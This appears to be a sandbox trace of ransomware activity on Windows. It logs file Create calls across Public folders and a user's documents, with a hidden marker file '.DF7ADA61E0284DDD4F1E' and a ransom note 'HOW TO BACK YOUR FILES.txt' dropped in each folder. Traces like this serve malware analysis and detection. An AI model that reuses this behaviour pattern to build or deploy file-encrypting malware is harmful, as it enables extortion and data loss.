Create C:\Users\Public\Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Music\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Libraries\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\Libraries\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Libraries\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Downloads\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\Downloads\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Downloads\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Documents\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\Documents\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\6m3SI3dOGnEdL5ygZWhk.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\Af2lBDHgvyvVLDNQ.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\FQWRTCLMeL48zp5.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\knQ-Rci.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\PytqJVdftFy7.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\Y61U0ZM ieIG3.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\MVCFvXeIE_Qtn.pptx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\rgQBy-ZQ.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\w75wj2Ar4H7R.pptx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\_EGFqZRU0R-jfWliuRra.pps desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\tXURx5G nKz1-yFLOrN2.ods desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\UU3lmUypRB5ho.pdf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\UZluNg.xls desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\YwlwHTYTPBDD.ods desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\6sKwaVfWDs- N8iI76.odp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\AzKSh6mANQ.xlsx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\kJcIUIZYh.xlsx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\LYfHjF1fhtf.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\25Syj.ppt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\as zumeG BO7h.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\j19gTj0.odt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\oyOp6 2 8AWICxI.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\XARM70VArEzpuNLrV2.pdf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\8OgR8sFF5hH-i.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\HcIdfOBoqv.doc desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\IKBwdpaf.ppt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\dNHkA8wGrHl1i.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\neWkdufSFGT9V.xlsx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\UD6h0kBtk.pdf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\wq1KdpB5Z.doc desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\yP7-fIabHWCsx0qu8I.ppt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\AfAqhaEDPAX\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\AfAqhaEDPAX\B47wIBV.ots desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\AfAqhaEDPAX\jNRxBhMqWYH.pps desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\AfAqhaEDPAX\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\-xx1WPzrvn9hNRC9SK.csv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\7vYmr.xls desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\9uXV.pptx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\EBOTTvLtpAXwg.ods desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\FS7rFKvZONVfHr.odt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\5-Bb3L9v35.odp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
